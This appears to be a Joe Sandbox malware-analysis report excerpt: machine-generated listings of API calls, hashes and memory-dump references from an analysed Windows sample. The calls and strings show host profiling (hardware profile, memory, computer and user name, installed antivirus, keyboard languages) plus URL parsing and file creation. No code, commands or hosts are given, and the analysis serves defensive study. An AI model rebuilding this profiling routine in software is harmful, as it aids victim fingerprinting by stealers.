                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2311089104-0
                                                                                                                                                                                                                                                    • Opcode ID: 7c829af986833a1223f99d02b1948c6a95ff0f5e84c882a3e993f63c10f5503a
                                                                                                                                                                                                                                                    • Instruction ID: ef7a3ba21b4639bb3a8a236f40f2f30302c6c002df8b27a244a547c49045e2e4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c829af986833a1223f99d02b1948c6a95ff0f5e84c882a3e993f63c10f5503a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D114970901204EFDF61AFA4EC88AAE7BB8FB44781F604549F481E6250EB719A85DF11
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 0009175E
                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(000B31B0,00000000,00000001,000BAF60,?,00000018,00091901,?), ref: 00091781
                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 0009178E
                                                                                                                                                                                                                                                    • _wtoi64.MSVCRT ref: 000917C1
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 000917DA
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 000917E1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 181426013-0
                                                                                                                                                                                                                                                    • Opcode ID: 60d928a025cc4913a315018d2f487f00d379e7f192d6add3fd6dab0bcd9ebf8f
                                                                                                                                                                                                                                                    • Instruction ID: 0f33783c9be58c5d2c1b5d3e76b1d13ead32d27221b2573d4c5034429f4a1323
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60d928a025cc4913a315018d2f487f00d379e7f192d6add3fd6dab0bcd9ebf8f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5114974A0424BDFCF009FE8CC889EEBBB6AF49300F104569F205E72A1CB354945DB50
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 000916CE
                                                                                                                                                                                                                                                      • Part of subcall function 000923D5: malloc.MSVCRT ref: 000923DA
                                                                                                                                                                                                                                                      • Part of subcall function 000923D5: strncpy.MSVCRT ref: 000923EB
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 000916F6
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32(?,000B6ECC,?,?,?,?,?), ref: 00091713
                                                                                                                                                                                                                                                    • GetCurrentHwProfileA.ADVAPI32(?), ref: 0009169F
                                                                                                                                                                                                                                                      • Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                                                                                                                                                                    • String ID: Unknown
                                                                                                                                                                                                                                                    • API String ID: 2781187439-1654365787
                                                                                                                                                                                                                                                    • Opcode ID: 2a6d9cfb85ad2fc1b77a7d84ec99969de463a13d42c6839285cee2645c6287eb
                                                                                                                                                                                                                                                    • Instruction ID: d5649d3a1814d2a26cd09de50c0fee88fdb20eeb41c490a87a394e5d659e1dda
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a6d9cfb85ad2fc1b77a7d84ec99969de463a13d42c6839285cee2645c6287eb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A114F71A0011DABDF21FBA4DC86FDDB3B8BB18710F4004E2B685E7152EA74AE849F50
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,000B6910,Display Resolution: ,000B68F4,00000000,User Name: ,000B68E4,00000000,Computer Name: ,000B68D0,AV: ,000B68C4,Install Date: ), ref: 00091131
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00091138
                                                                                                                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00091154
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 0009117A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                                                    • String ID: %d MB
                                                                                                                                                                                                                                                    • API String ID: 3644086013-2651807785
                                                                                                                                                                                                                                                    • Opcode ID: 2d4f6e94e532a2b82f51f5e4c1b99874bb7397b119eec0f2a406502f3f1153ab
                                                                                                                                                                                                                                                    • Instruction ID: 29f00ffedb859aaa376ea63d0ccfc45cf3c9efc3a20993ee3b7637ae054d02d3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d4f6e94e532a2b82f51f5e4c1b99874bb7397b119eec0f2a406502f3f1153ab
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC01A2B1F01208ABEF04EFB4EC49AFE77B8EF04700F440066F612DA280EA309C419750
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,763374F0,?,0009CBEE,?,0009CC7C,00000000,06400000,00000003,00000000,0009757F,.exe,000B6C5C), ref: 0009BC6E
                                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,763374F0,?,0009CBEE,?,0009CC7C,00000000,06400000,00000003,00000000), ref: 0009BCA6
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CreatePointer
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2024441833-0
                                                                                                                                                                                                                                                    • Opcode ID: 91536c1652fc4f4fcb26b7b48219555f4ebf63584d7f241e948f6b0d400795fe
                                                                                                                                                                                                                                                    • Instruction ID: 929e99f4aea00bed99b8fccb3586907965a13e32102e4576fc322b879a237102
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91536c1652fc4f4fcb26b7b48219555f4ebf63584d7f241e948f6b0d400795fe
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 993185F0505705DFDF709F25AAC4B277AE8AB15368F108E2EF19782581E3349884EB12
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AE8
                                                                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AEE
                                                                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00084AF4
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00084B06
                                                                                                                                                                                                                                                    • InternetCrackUrlA.WININET(000000FF,00000000), ref: 00084B0E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1274457161-0
                                                                                                                                                                                                                                                    • Opcode ID: 8b907adafe743c9af23b8d15c49becc25c6298975255969e0a02ee2a45ba29cd
                                                                                                                                                                                                                                                    • Instruction ID: 2bc67e2f4556ea46d665cd1b69887c04089eac78351d8166370ac468ad471b35
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b907adafe743c9af23b8d15c49becc25c6298975255969e0a02ee2a45ba29cd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7012131D00218ABDF149BA9EC45ADEBFB8EF55330F108216F965F72E0D7745A058B94
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00094252,Processor: ,[Hardware],000B6950,00000000,TimeZone: ,000B6940,00000000,Local Time: ,000B692C), ref: 00090F65
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00094252,Processor: ,[Hardware],000B6950,00000000,TimeZone: ,000B6940,00000000,Local Time: ,000B692C,Keyboard Languages: ,000B6910), ref: 00090F6C
                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,000B6888,?,?,?,00094252,Processor: ,[Hardware],000B6950,00000000,TimeZone: ,000B6940,00000000,Local Time: ), ref: 00090F8A
                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(000B6888,00000000,00000000,00000000,000000FF,?,?,?,00094252,Processor: ,[Hardware],000B6950,00000000,TimeZone: ,000B6940,00000000), ref: 00090FA6
                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(000B6888,?,?,?,00094252,Processor: ,[Hardware],000B6950,00000000,TimeZone: ,000B6940,00000000,Local Time: ,000B692C,Keyboard Languages: ,000B6910), ref: 00090FAF
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_80000_noll.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3466090806-0
                                                                                                                                                                                                                                                    • Opcode ID: 2e32b00c2404316b88e07945c9a2a133fdc7f044518bee1cbc778b50800011b0
                                                                                                                                                                                                                                                    • Instruction ID: ab19ce2f7b0b55da148be262692ef949bd14463d5bb4d43deb647237bd0e45d3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e32b00c2404316b88e07945c9a2a133fdc7f044518bee1cbc778b50800011b0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0F03A76A41204FFEF106B90FC0EFAA7B7CEB44B45F150066F601A90A0E7B09E509B60
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,=,00000000,?), ref: 0009226C
                                                                                                                                                                                                                                                    • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00092287
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0009228E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
